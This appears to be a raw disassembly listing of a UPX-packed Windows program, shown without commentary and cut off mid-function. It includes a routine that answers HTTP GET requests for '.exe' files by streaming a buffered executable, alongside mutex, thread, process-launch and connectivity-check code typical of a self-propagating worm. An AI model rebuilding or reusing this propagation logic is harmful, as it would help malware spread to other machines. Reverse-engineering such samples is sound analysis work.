########################## SUBROUTINE ##########################
sub_3100195C proc near ; CODE XREF: sub_31001C18 + B�p
; UPX0:31001DA0�p ...
var_8 = dword ptr - 8
var_4 = dword ptr - 4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ ebp + var_8 ], eax
popa
mov [ ebp + var_4 ], esp
call dword_310010A4 ; GetTickCount
mov ecx, [ ebp + var_4 ]
imul ecx, [ ebp + var_8 ]
add eax, ecx
push eax
call dword_310010FC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3100195C endp
########################## SUBROUTINE ##########################
sub_3100198A proc near ; CODE XREF: sub_31001851 + EA�p
; UPX0:31001DAA�p ...
arg_0 = dword ptr 4
push [ esp + arg_0 ]
push 1
push 0
call dword_310010A8 ; CreateMutexA
retn
sub_3100198A endp
########################## SUBROUTINE ##########################
sub_31001999 proc near ; CODE XREF: sub_31001E06 + E3�p
; sub_31001E06 + EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ ebp + arg_4 ]
push eax
xor eax, eax
push eax
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
push eax
push eax
call dword_310010AC ; CreateThread
pop ebp
retn
sub_31001999 endp
########################## SUBROUTINE ##########################
sub_310019B3 proc near ; CODE XREF: sub_31001C18 + 12C�p
; sub_31001FA5 + 5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ ebp + arg_4 ]
push eax
xor eax, eax
push eax
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
push eax
push eax
call dword_310010AC ; CreateThread
push eax
call dword_31001098 ; CloseHandle
pop ebp
retn
sub_310019B3 endp
########################## SUBROUTINE ##########################
sub_310019D4 proc near ; CODE XREF: sub_31002476 + 3B�p
; sub_31002542 + 64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [ esp + 4 + arg_0 ]
push esi
push edi
mov edi, [ esp + 0Ch + arg_4 ]
xor esi, esi
test edi, edi
jle short loc_310019FC
loc_310019E5: ; CODE XREF: sub_310019D4 + 26�j
call dword_310010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [ esi + ebx ], dl
inc esi
cmp esi, edi
jl short loc_310019E5
loc_310019FC: ; CODE XREF: sub_310019D4 + F�j
and byte ptr [ ebx + edi ], 0
pop edi
pop esi
pop ebx
retn
sub_310019D4 endp
########################## SUBROUTINE ##########################
sub_31001A04 proc near ; CODE XREF: sub_310026A6 + 105�p
var_54 = dword ptr - 54h
var_24 = word ptr - 24h
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ ebp + var_54 ]
push edi
push esi
push eax
call sub_31002B8C ; memset
mov ax, [ ebp + arg_4 ]
add esp, 0Ch
mov [ ebp + var_24 ], ax
lea eax, [ ebp + var_10 ]
push eax
lea eax, [ ebp + var_54 ]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ ebp + var_54 ], edi
push [ ebp + arg_0 ]
push esi
call dword_310010B0 ; CreateProcessA
push [ ebp + var_C ]
mov esi, dword_31001098
mov edi, eax
call esi ; CloseHandle
push [ ebp + var_10 ]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31001A04 endp
########################## SUBROUTINE ##########################
sub_31001A5A proc near ; CODE XREF: sub_3100202D + 3E�p
; sub_310020F4 + 7�p ...
var_34 = byte ptr - 34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ ebp + var_34 ]
push 31h
push eax
call dword_3100114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31001A7B
call dword_31001150 ; WSAGetLastError
xor eax, eax
leave
retn
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001A7B: ; CODE XREF: sub_31001A5A + 15�j
lea eax, [ ebp + var_34 ]
push eax
call dword_31001154 ; gethostbyname
test eax, eax
jnz short loc_31001A90
mov eax, 100007Fh
leave
retn
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001A90: ; CODE XREF: sub_31001A5A + 2D�j
mov eax, [ eax + 0Ch ]
mov eax, [ eax ]
mov eax, [ eax ]
leave
retn
sub_31001A5A endp
########################## SUBROUTINE ##########################
sub_31001A99 proc near ; CODE XREF: sub_31001F41 + 22�p
; sub_31001FA5 + 27�p ...
var_4 = byte ptr - 4
push ecx
lea eax, [ esp + 4 + var_4 ]
push 0
push eax
call dword_31001134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31001A99 endp
########################## SUBROUTINE ##########################
sub_31001AAF proc near ; CODE XREF: sub_31001E06 + 40�p
; sub_31001E06 + 4C�p ...
arg_0 = dword ptr 4
push [ esp + arg_0 ]
push 0
push 2
call dword_310010B8 ; OpenEventA
test eax, eax
jz short locret_31001AC8
push eax
call dword_310010B4 ; SetEvent
locret_31001AC8: ; CODE XREF: sub_31001AAF + 10�j
retn
sub_31001AAF endp
########################## SUBROUTINE ##########################
sub_31001AC9 proc near ; CODE XREF: UPX0:31002B69�p
push esi
mov esi, dword_310010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31001AC9 endp
########################## SUBROUTINE ##########################
sub_31001ADF proc near ; DATA XREF: sub_31001C18 + 127�o
var_200 = byte ptr - 200h
var_100 = byte ptr - 100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ ebp + arg_0 ]
push esi
push edi
xor edi, edi
lea eax, [ ebp + var_100 ]
push edi
push 100h
push eax
push ebx
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31001B10
push 1
jmp loc_31001BCB
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001B10: ; CODE XREF: sub_31001ADF + 28�j
mov esi, dword_310010F4
lea eax, [ ebp + var_100 ]
push offset aGet ; \"GET\"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
lea eax, [ ebp + var_100 ]
push offset a_exe ; \".exe\"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31001BCE
mov esi, dword_31001168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; \"HTTP/1.1 200 OK\r\nContent - Type: applicat\"...
push ebx
call esi ; send
push dword_31004FC0
lea eax, [ ebp + var_200 ]
push offset aContentLengthU ; \"Content - Length: %u\r\n\r\n\"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
lea eax, [ ebp + var_200 ]
push 0
push eax
call sub_31002B92 ; strlen
pop ecx
push eax
lea eax, [ ebp + var_200 ]
push eax
push ebx
call esi ; send
loc_31001B8D: ; CODE XREF: sub_31001ADF + E8�j
mov eax, dword_31004FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31001B9F
mov eax, ecx
loc_31001B9F: ; CODE XREF: sub_31001ADF + BC�j
test eax, eax
jz short loc_31001BEC
push 0
push eax
mov eax, dword_31004FB8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31001BC9
cmp eax, 1000h
jb short loc_31001BEC
push 64h
add edi, eax
call dword_31001080 ; Sleep
jmp short loc_31001B8D
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001BC9: ; CODE XREF: sub_31001ADF + D5�j
push 2
loc_31001BCB: ; CODE XREF: sub_31001ADF + 2C�j
pop eax
jmp short loc_31001C11
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001BCE: ; CODE XREF: sub_31001ADF + 49�j
; sub_31001ADF + 61�j
mov esi, dword_31001168
push 0
push 15h
push offset aHttp1_1200Ok ; \"HTTP/1.1 200 OK\r\n\r\n\r\n\"
push ebx
call esi ; send
push 0
push 3
push offset dword_31004A80
push ebx
call esi ; send
loc_31001BEC: ; CODE XREF: sub_31001ADF + C2�j
; sub_31001ADF + DC�j
push 7D0h
call dword_31001080 ; Sleep
push 2
push ebx
call dword_31001170 ; shutdown
push ebx
call dword_31001174 ; closesocket
push 0
call dword_310010BC ; ExitThread
xor eax, eax
loc_31001C11: ; CODE XREF: sub_31001ADF + ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31001ADF endp
########################## SUBROUTINE ##########################
sub_31001C18 proc near ; DATA XREF: sub_31001E06 + DE�o
var_130 = byte ptr - 130h
var_28 = byte ptr - 28h<